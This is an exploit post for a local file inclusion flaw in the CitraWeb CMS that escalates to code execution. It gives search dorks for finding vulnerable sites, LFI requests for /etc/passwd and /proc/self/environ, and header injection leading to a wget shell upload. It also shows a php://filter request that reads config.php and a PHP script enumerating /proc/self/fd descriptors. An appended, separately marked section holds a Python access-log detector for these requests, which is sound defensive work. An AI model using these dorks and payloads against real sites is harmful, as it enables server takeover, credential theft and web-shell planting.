CitraWeb LFI to RCE




CXSECURITY : cxsecurity.com/issue/WLB-2019060011
> Dorking first
DORK:
inurl:/cni-content/*/*.jpg
inurl:/cni-content/*/
intext:Designed & Developed by Citraweb Nusa Info Media
> Assume I've already got a vulnerable target. How do you check that it's vulnerable? host.com/system/ajax/?/etc/passwd
> Let's try opening /proc/self/environ
Look, our HTTP headers show up in there :d so just change an HTTP header :v it can be User-Agent, Accept, Cookie, etc.
Let's try it with Accept
Then just upload a shell :D How? wget, lol :v
What if /proc/self/environ isn't there? :D
You can grab the config :D How?
/system/ajax/?php://filter/convert.base64-encode/resource=cni-system/config/config.php
or you can use /proc/self/fd/{NUMBER}
or /home/{USER}/access-logs/{WEBSITE}

For /proc/self/fd/{NUMBER} I have a tool :D
<?php
// Request /proc/self/fd/0 through /proc/self/fd/1000 via the include parameter
// and report which descriptor numbers return HTTP 200.
for($i=0; $i <= 1000; $i++){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, "https://{WEBSITE HERE}system/ajax/?php://filter/convert.base64-encode/resource=/proc/self/fd/$i");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $c = curl_exec($ch);
  $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  curl_close($ch); // release the handle before the next iteration
  if($http == 200){
    echo $i. " -> Success\n";
  }
  else{
    echo $i . " -> Failed\n";
  }
}

- RINTOD -
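
The requests described in this post leave a recognizable trail in the web server's access log. The following is an added detection example, not code from the original post: it flags requests to /system/ajax/ whose query string names the inclusion targets listed above, and clients that enumerate /proc/self/fd/ numbers. The combined log format, the threshold value and all sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Combined log format: client IP, request target, status, size, referer, user agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Inclusion targets named in the post, matched against the decoded query string.
RULES = {
    "php-wrapper": re.compile(r"php://", re.I),
    "proc-environ": re.compile(r"/proc/self/environ"),
    "proc-fd": re.compile(r"/proc/self/fd/\d+"),
    "system-file": re.compile(r"/etc/passwd"),
    "config-read": re.compile(r"cni-system/config/"),
    "log-read": re.compile(r"/access-logs/"),
}
PHP_TAG = re.compile(r"<\?(php|=)", re.I)  # PHP code planted in a logged header
FD_SWEEP_THRESHOLD = 3  # assumed tuning value: distinct fd numbers per client

def scan(lines):
    """Return (alerts, sweepers): flagged /system/ajax/ requests and fd-enumerating IPs."""
    alerts, fds = [], {}
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if not path.rstrip("/").endswith("/system/ajax"):
            continue
        query = unquote(unquote(query))  # undo single and double URL encoding
        tags = [name for name, rx in RULES.items() if rx.search(query)]
        if PHP_TAG.search(m["ua"]):
            tags.append("php-in-header")
        for fd in re.findall(r"/proc/self/fd/(\d+)", query):
            fds.setdefault(m["ip"], set()).add(fd)
        if tags:
            alerts.append((n, m["ip"], tags))
    sweepers = sorted(ip for ip, s in fds.items() if len(s) >= FD_SWEEP_THRESHOLD)
    return alerts, sweepers

def _line(ip, target, ua="Mozilla/5.0"):  # builds one constructed log line
    return f'{ip} - - [01/Jun/2019:10:00:00 +0700] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'

SAMPLE_LOG = [  # constructed traffic using documentation-range addresses
    _line("198.51.100.7", "/system/ajax/?page=news"),
    _line("203.0.113.9", "/system/ajax/?/etc/passwd"),
    _line("203.0.113.9", "/system/ajax/?/proc/self/environ", "<?php /* constructed */ ?>"),
    _line("203.0.113.9", "/system/ajax/?php%3A%2F%2Ffilter/convert.base64-encode/resource=cni-system/config/config.php"),
] + [_line("203.0.113.9", f"/system/ajax/?php://filter/convert.base64-encode/resource=/proc/self/fd/{i}") for i in range(3)]
```

The default combined log format records only the Referer and User-Agent headers, so a marker placed in Accept or Cookie is visible to this check only if the log format is extended to include those headers.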
